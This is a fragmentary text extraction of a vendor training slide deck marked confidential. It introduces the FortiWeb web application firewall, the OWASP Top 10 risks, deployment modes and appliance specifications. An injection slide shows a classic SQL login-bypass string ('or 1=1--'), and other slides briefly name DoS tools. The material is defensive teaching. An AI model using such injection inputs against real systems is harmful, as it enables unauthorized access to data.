Fortinet Confidential
Xtreme Team:
Introduction to FortiWeb
And application layer attacks
Fortinet Confidential
AGENDA
FortiWeb Overview
Deployment Modes
Product Family
FortiWeb Labs
Fortinet Confidential
Fortinet Confidential
Internet
Fortinet Confidential
Web Applications
Database Servers
Fortinet Confidential
Web Application
HTTP
Network
Web Services
Web Servers
Wireless
Presentation
Layer
Media Store
Browser
Application
Server
Database
Server
Business
Logic
Customer
Identification
Content
Services
Access
Controls
Transaction
Information
Core Business
Data
Fortinet Confidential
Fortinet Confidential
Fortinet Confidential
10
Fortinet Confidential
Security Professionals
Dont Know The
Applications
As a Network Security
Professional, I dont
know how my
companies web
applications are
supposed to work so I
deploy a protective
solutionbut dont
know if its protecting
what its supposed to.
11
Application
Developers Dont
Know Security
Fortinet Confidential
Internet
IIS
SunOne
Apache
Trusted
Inside
DMZ
ASP
.NET
WebSphere
Java
SQL
Oracle
DB2
HTTP(S)
Browser
Allows HTTP port 80
Allows HTTPS port 443
12
Firewall only
allows applications
on the web server
to talk to
application server
Firewall only
allows application
server to talk to
database server
Corporate
Inside
Fortinet Confidential
13
Fortinet Confidential
Always Remember
14
Fortinet Confidential
15
Fortinet Confidential
Injections
User
User
Pass
Firewall
Web Server
16
Form
DB Server
Fortinet Confidential
1.
2.
3.
4.
5.
6.
User
Pass or 1=1--
Firewall
Web Server
17
Form
DB Server
Fortinet Confidential
18
Fortinet Confidential
19
Fortinet Confidential
20
Steal cookies
Hijack of users session
Alter the content of a web page
Spy on what you do
Map your Network
And a long etc
Fortinet Confidential
10
XSS Explained
21
Fortinet Confidential
Fortinet Confidential
11
23
Fortinet Confidential
Information Leaking
24
Fortinet Confidential
12
Misconfigurations
25
Fortinet Confidential
26
Fortinet Confidential
13
27
Fortinet Confidential
28
Fortinet Confidential
14
29
Fortinet Confidential
30
Fortinet Confidential
15
31
Fortinet Confidential
Conclusions
32
Fortinet Confidential
16
33
Fortinet Confidential
Fortinet Confidential
17
35
Fortinet Confidential
Network Firewall
IPS/Deep Packet
Inspection Firewalls
FortiWeb
Web Application Firewall
Network layer
(OSI 1-3)
Application layer
(OSI 4-7)
Fortinet Confidential
18
A1-Injection
Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is
sent to an interpreter as part of a command or query. The attackers hostile data can
trick the interpreter into executing unintended commands or accessing unauthorized
data
A2Broken
Authentication and
Session Management
Application functions related to authentication and session management are often not
implemented correctly, allowing attackers to compromise passwords, keys, session
tokens, or exploit other implementation flaws to assume other users identities
A3Cross-Site
Scripting (XSS)
XSS flaws occur whenever an application takes untrusted data and sends it to a web
browser without proper validation or escaping. XSS allows attackers to execute scripts
in the victims browser which can hijack user sessions, deface web sites, or redirect the
user to malicious sites
A4Insecure Direct
Object References
A5Security
Misconfiguration
Good security requires having a secure configuration defined and deployed for the
application, frameworks, application server, web server, database server, and platform.
All these settings should be defined, implemented, and maintained as many are not
shipped with secure defaults. This includes keeping all software up to date
37
Fortinet Confidential
A6Sensitive Data
Exposure
Many web applications do not properly protect sensitive data, such as credit cards, tax ids, and
authentication credentials. Attackers may steal or modify such weakly protected data to conduct identity
theft, credit card fraud, or other crimes. Sensitive data deserves extra protection such as encryption at
rest or in transit, as well as special precautions when exchanged with the browser
A7Missing Function
Level Access Control
Virtually all web applications verify function level access rights before making that functionality visible in
the UI. However, applications need to perform the same access control checks on the server when each
function is accessed. If requests are not verified, attackers will be able to forge requests in order to
access unauthorized functionality
A8-Cross-Site Request
Forgery (CSRF)
A CSRF attack forces a logged-on victims browser to send a forged HTTP request, including the
victims session cookie and any other automatically included authentication information, to a vulnerable
web application. This allows the attacker to force the victims browser to generate requests the
vulnerable application thinks are legitimate requests from the victim
A9-Using Components
with Known
Vulnerabilities
Vulnerable components, such as libraries, frameworks, and other software modules almost always run
with full privilege. So, if exploited, they can cause serious data loss or server takeover. Applications
using these vulnerable components may undermine their defenses and enable a range of possible
attacks and impacts
A10Unvalidated
Redirects and
Forwards
Web applications frequently redirect and forward users to other pages and websites, and use untrusted
data to determine the destination pages. Without proper validation, attackers can redirect victims to
phishing or malware sites, or use forwards to access unauthorized pages
38
Fortinet Confidential
19
PCI DSS
Requirement 6: Develop and maintain secure systems and apps
39
Patching
Configuration
Development lifecycle
Testing
Production
Fortinet Confidential
40
Fortinet Confidential
20
FortiWeb Overview
41
Fortinet Confidential
Cross-site scripting
SQL injection
Information Leakage
HTTP Response Splitting
42
Fortinet Confidential
21
43
Fortinet Confidential
WAF
Application Delivery
Assures availability and accelerates performance of critical web applications
Secures Web
Applications
44
Optimizes Application
Delivery
Fortinet Confidential
22
Protocol Validation
Validates HTTP RFC compliance
45
Fortinet Confidential
46
Fortinet Confidential
23
FortiWeb Customers
Government
47
Telco
Retail/Technology/Financial/Other
Fortinet Confidential
48
Fortinet Confidential
24
49
Fortinet Confidential
50
Fortinet Confidential
25
51
Fortinet Confidential
Parameter Tampering
Hidden field rules prevent
tampering by caching the values
of a sessions hidden inputs as
they pass from the server to the
client, and verifying that they
remain unchanged when the
client submits the form to its
POST URL
52
Fortinet Confidential
26
Access Control
Control clients access to Web applications
and limit the rate of requests
Restricting access to specific URLs
Enforce page order that follows application
logic
Specify URLs allowed to initiate sessions
Specify allowed HTTP methods
53
Fortinet Confidential
54
Fortinet Confidential
27
55
Fortinet Confidential
56
Fortinet Confidential
28
DoS/DDoS Protection
Requests originated from different users are
analyzed, based on different characteristics
such as IP and cookie
FortiWeb detects are real users or automated
attacks (HOIC, LOIC tools)
Application layer policies
Network layer
Number of TCP connections from the same source IP address
SYN flood attacks
57
Fortinet Confidential
58
Fortinet Confidential
29
59
Fortinet Confidential
Enhanced/Basic Mode
Authentication options
Granular crawling capabilities
Schedule and on demand
scanning
60
Fortinet Confidential
30
Server Information
Crawling information
URLs accepting input
External Links
Reports could be
automatically emailed
Updates via FortiGuard
61
Fortinet Confidential
Round Robin
Weighted Round Robin
Least Connection
HTTP Session Based Round Robin
Connection persistence
Persistence timeout value
62
Fortinet Confidential
31
63
Fortinet Confidential
64
Fortinet Confidential
32
Authentication Offloading
Offload your web server authentication to
FortiWeb
Support of different authentication
schemes
Locally-defined accounts
LDAP
RADIUS
NTLM
65
Fortinet Confidential
66
Fortinet Confidential
33
67
Fortinet Confidential
Event/Attack/Traffic Alerts
Attack Alerts
Full HTTP request
Traffic Alerts
Any access to web
applications
Event Alerts
Any action on
FortiWeb device
68
Fortinet Confidential
34
Reports - Attacks
Out of the box rich and
graphical reports
Custom reports
Scheduled daily,
weekly, Monthly or
on demand
PDF, HTML, Word,
TXT, MHT formats
69
Fortinet Confidential
Report on any
access or change
to the FortiWeb
device
70
Fortinet Confidential
35
Deployment Modes
71
Fortinet Confidential
FortiWeb
Web Application
Servers
Reverse Proxy
FortiWeb
72
Fortinet Confidential
36
73
Fortinet Confidential
Features by Mode
Operation Mode
Feature
Reverse
Proxy
True Transparent
Proxy
HTTP
Transparent
Inspection
Offline
Protection
HTTPS
Bridges / V-zones
Client Certificate Verification
Config. Sync (Non-HA)
Cookie Poisoning Prevention
DoS Protection
Error Page Customization
Fail-to-wire
File Compression
Hidden Input Constraints
HA
Information Disclosure Prevention
Page Order Rules
74
Fortinet Confidential
37
Reverse
Proxy
True Transparent
Proxy
HTTP
Transparent
Inspection
Offline
Protection
HTTPS
Rewriting / Redirection
Session Management
SSL/TLS Offloading
SSLv3 Support
SSLv2 Support
Start Page Enforcement
User Authentication
X-Forwarded-For: Support
XML Protection
75
Fortinet Confidential
Fortinet Confidential
38
77
Fortinet Confidential
78
Fortinet Confidential
39
Transparent Mode
No changes to the IP address scheme
of the network are required
Fewer features than reverse proxy
mode
Web Servers will see the source IP
address of clients.
The appliance will forward nonHTTP/HTTPS protocols.
79
Fortinet Confidential
80
Fortinet Confidential
40
81
Fortinet Confidential
FortiWeb transparently proxies the traffic arriving on a port that belongs to a L2 bridge
Applies the first applicable policy, and lets permitted traffic pass through.
FortiWeb logs, blocks, or modifies violations
This mode supports user authentication via HTTP but not HTTPS.
Transparent inspection
FortiWeb asynchronously inspects traffic arriving on a port that belongs to a L2 bridge
Applies the first applicable policy, and lets permitted traffic pass through.
(Because it is asynchronous, it minimizes latency.)
FortiWeb logs or blocks traffic but does not otherwise modify it
(It cannot offload SSL, load-balance connections, or support user authentication)
82
Fortinet Confidential
41
Fortinet Confidential
84
Fortinet Confidential
42
Product Family
85
Fortinet Confidential
FortiWeb 400c
Hardware Performance
Throughput
SSL Throughput
100 Mb
70Mb
Connections x Second
Form Factor
Storage Capacity
Interfaces
86
1U
1 TB
4 x 10/100/1000
Fortinet Confidential
43
FortiWeb 1000c
Hardware Performance
Throughput
SSL Throughput
500 Mb
400Mb
Connections x Second
Form Factor
Storage Capacity
Interfaces
87
1U
1 TB
4 x 10/100/1000 (2x bypass)
Fortinet Confidential
FortiWeb 3000c
Hardware Performance
Throughput
SSL Throughput
1 Gb
630 Mb
Connections x Second
Form Factor
Storage Capacity
Interfaces
88
2U
2 TB
6 x 10/100/1000 (2x bypass)
Fortinet Confidential
44
FortiWeb 4000c
Hardware Performance
Throughput
2 Gb
SSL Throughput
1 Gb
Connections x Second
Form Factor
2U
Storage Capacity
2 TB
Interfaces
89
Fortinet Confidential
FortiWeb VM Series
FortiWeb
Throughput
Max HTTP transactions
/ Sec
Max vCPU Supported
90
FWB-VM02
FWB-VM04
FWB-VM08
100 Mbps
500 Mbps
1 Gbps
8,000
24,000
36,000
1 GB
40 GB
Fortinet Confidential
45
91
Fortinet Confidential
46